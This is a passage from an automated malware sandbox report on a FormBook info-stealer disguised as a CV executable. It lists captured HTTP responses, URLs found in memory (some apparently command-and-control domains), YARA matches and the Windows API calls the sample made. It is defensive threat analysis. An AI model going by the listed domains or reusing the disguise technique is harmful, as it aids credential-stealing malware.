server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 16:05:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 16:05:57 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 16:06:00 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 16:06:03 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 16:06:06 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a747c1-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: netbtugc.exe, 00000004.00000002.33210230485.000000000504A000.00000004.10000000.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33209827045.0000000003DCA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://premium303max.rest/s6a5/?IBQP=uWOvS5Yjm7YhBkSIFatO2CB0bHUF5BB4gnfnOBn
                Source: Maryam Farokhi-PhD- CV-1403.exeString found in binary or memory: http://tempuri.org/ds.xsd
                Source: ptzMmYcrKro.exe, 00000005.00000002.33208331721.00000000008CF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wcp95.top
                Source: ptzMmYcrKro.exe, 00000005.00000002.33208331721.00000000008CF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wcp95.top/nv0k/
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: netbtugc.exe, 00000004.00000002.33210230485.00000000043BA000.00000004.10000000.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33209827045.000000000313A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.adm.tools/parking-page/style.css
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: aU043Z43.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmp, aU043Z43.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: aU043Z43.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: netbtugc.exe, 00000004.00000003.30251497450.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30251497450.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33207890621.0000000002ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                Source: netbtugc.exe, 00000004.00000003.30251497450.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30251497450.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33207890621.0000000002ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                Source: netbtugc.exe, 00000004.00000003.30251497450.0000000002EBC000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.30251497450.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33207890621.0000000002ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
                Source: netbtugc.exe, 00000004.00000002.33207890621.0000000002E9C000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33207890621.0000000002E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
                Source: netbtugc.exe, 00000004.00000002.33207890621.0000000002E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
                Source: netbtugc.exe, 00000004.00000003.30250427352.0000000008002000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33211544402.0000000008086000.00000004.00000020.00020000.00000000.sdmp, aU043Z43.4.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33211544402.0000000008086000.00000004.00000020.00020000.00000000.sdmp, aU043Z43.4.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: netbtugc.exe, 00000004.00000002.33210230485.00000000051DC000.00000004.10000000.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33209827045.0000000003F5C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: netbtugc.exe, 00000004.00000002.33211442161.00000000065B0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.33210230485.000000000454C000.00000004.10000000.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33209827045.00000000032CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: netbtugc.exe, 00000004.00000003.30255917594.0000000008022000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: aU043Z43.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: netbtugc.exe, 00000004.00000002.33210230485.00000000043BA000.00000004.10000000.00040000.00000000.sdmp, ptzMmYcrKro.exe, 00000005.00000002.33209827045.000000000313A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.ukraine.com.ua/wiki/hosting/errors/site-not-served/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Maryam Farokhi-PhD- CV-1403.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.30065570043.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.30063798828.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33208901058.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33207723172.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.33208331721.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.33208982855.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.33208941967.0000000002770000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.30065763340.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0042C6B3 NtClose,2_2_0042C6B3
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82A80 NtClose,LdrInitializeThunk,2_2_00F82A80
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00F82B90
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_00F82D10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F834E0 NtCreateMutant,LdrInitializeThunk,2_2_00F834E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F84260 NtSetContextThread,2_2_00F84260
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F84570 NtSuspendThread,2_2_00F84570
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F829F0 NtReadFile,2_2_00F829F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F829D0 NtWaitForSingleObject,2_2_00F829D0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82AC0 NtEnumerateValueKey,2_2_00F82AC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82AA0 NtQueryInformationFile,2_2_00F82AA0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82A10 NtWriteFile,2_2_00F82A10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82BE0 NtQueryVirtualMemory,2_2_00F82BE0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82BC0 NtQueryInformationToken,2_2_00F82BC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82B80 NtCreateKey,2_2_00F82B80
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82B20 NtQueryInformationProcess,2_2_00F82B20
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82B10 NtAllocateVirtualMemory,2_2_00F82B10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82B00 NtQueryValueKey,2_2_00F82B00
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82CF0 NtDelayExecution,2_2_00F82CF0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82CD0 NtEnumerateKey,2_2_00F82CD0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82C50 NtUnmapViewOfSection,2_2_00F82C50
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82C30 NtMapViewOfSection,2_2_00F82C30
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82C20 NtSetInformationFile,2_2_00F82C20
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82C10 NtOpenProcess,2_2_00F82C10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82DC0 NtAdjustPrivilegesToken,2_2_00F82DC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82DA0 NtReadVirtualMemory,2_2_00F82DA0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82D50 NtWriteVirtualMemory,2_2_00F82D50
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82ED0 NtResumeThread,2_2_00F82ED0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82EC0 NtQuerySection,2_2_00F82EC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82EB0 NtProtectVirtualMemory,2_2_00F82EB0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82E80 NtCreateProcessEx,2_2_00F82E80
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82E50 NtCreateSection,2_2_00F82E50
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82E00 NtQueueApcThread,2_2_00F82E00
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82FB0 NtSetValueKey,2_2_00F82FB0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82F30 NtOpenDirectoryObject,2_2_00F82F30
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82F00 NtCreateFile,2_2_00F82F00
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F838D0 NtGetContextThread,2_2_00F838D0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F83C90 NtOpenThread,2_2_00F83C90
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F83C30 NtOpenProcessToken,2_2_00F83C30
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B4260 NtSetContextThread,LdrInitializeThunk,4_2_034B4260
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B4570 NtSuspendThread,LdrInitializeThunk,4_2_034B4570
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2B00 NtQueryValueKey,LdrInitializeThunk,4_2_034B2B00
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_034B2B10
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_034B2BC0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2B80 NtCreateKey,LdrInitializeThunk,4_2_034B2B80
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_034B2B90
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2A10 NtWriteFile,LdrInitializeThunk,4_2_034B2A10
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2AC0 NtEnumerateValueKey,LdrInitializeThunk,4_2_034B2AC0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2A80 NtClose,LdrInitializeThunk,4_2_034B2A80
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B29F0 NtReadFile,LdrInitializeThunk,4_2_034B29F0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2F00 NtCreateFile,LdrInitializeThunk,4_2_034B2F00
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2E50 NtCreateSection,LdrInitializeThunk,4_2_034B2E50
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2E00 NtQueueApcThread,LdrInitializeThunk,4_2_034B2E00
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2ED0 NtResumeThread,LdrInitializeThunk,4_2_034B2ED0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_034B2D10
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2DA0 NtReadVirtualMemory,LdrInitializeThunk,4_2_034B2DA0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2C50 NtUnmapViewOfSection,LdrInitializeThunk,4_2_034B2C50
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2C30 NtMapViewOfSection,LdrInitializeThunk,4_2_034B2C30
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2CF0 NtDelayExecution,LdrInitializeThunk,4_2_034B2CF0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B34E0 NtCreateMutant,LdrInitializeThunk,4_2_034B34E0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B38D0 NtGetContextThread,LdrInitializeThunk,4_2_034B38D0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2B20 NtQueryInformationProcess,4_2_034B2B20
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2BE0 NtQueryVirtualMemory,4_2_034B2BE0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2AA0 NtQueryInformationFile,4_2_034B2AA0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B29D0 NtWaitForSingleObject,4_2_034B29D0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2F30 NtOpenDirectoryObject,4_2_034B2F30
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2FB0 NtSetValueKey,4_2_034B2FB0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2EC0 NtQuerySection,4_2_034B2EC0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2E80 NtCreateProcessEx,4_2_034B2E80
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2EB0 NtProtectVirtualMemory,4_2_034B2EB0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2D50 NtWriteVirtualMemory,4_2_034B2D50
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2DC0 NtAdjustPrivilegesToken,4_2_034B2DC0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2C10 NtOpenProcess,4_2_034B2C10
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2C20 NtSetInformationFile,4_2_034B2C20
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B2CD0 NtEnumerateKey,4_2_034B2CD0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B3C30 NtOpenProcessToken,4_2_034B3C30
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_034B3C90 NtOpenThread,4_2_034B3C90
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C792A0 NtDeleteFile,4_2_02C792A0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C79340 NtClose,4_2_02C79340
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C79040 NtCreateFile,4_2_02C79040
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C791B0 NtReadFile,4_2_02C791B0
                Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02C794B0 NtAllocateVirtualMemory,4_2_02C794B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_019B42100_2_019B4210
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_019BE2A40_2_019BE2A4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_019B73900_2_019B7390
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_05F2340C0_2_05F2340C
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_05F2BF880_2_05F2BF88
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_05F234090_2_05F23409
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_05F261D10_2_05F261D1
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_05F2F1870_2_05F2F187
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_05F2BF870_2_05F2BF87
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_0788C0200_2_0788C020
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_078864D10_2_078864D1
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_078864E00_2_078864E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_078883F80_2_078883F8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_078860A80_2_078860A8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_07886D410_2_07886D41
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_07886D500_2_07886D50
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_078869180_2_07886918
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 0_2_078818C80_2_078818C8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004187B32_2_004187B3
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004030D02_2_004030D0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004101412_2_00410141
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004101432_2_00410143
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004169EF2_2_004169EF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004011F02_2_004011F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004169F32_2_004169F3
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004022E02_2_004022E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004103632_2_00410363
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0040E3E32_2_0040E3E3
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00402C002_2_00402C00
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004024A02_2_004024A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0042ECA32_2_0042ECA3
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_004027A02_2_004027A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0101010E2_2_0101010E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F400A02_2_00F400A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FFE0762_2_00FFE076
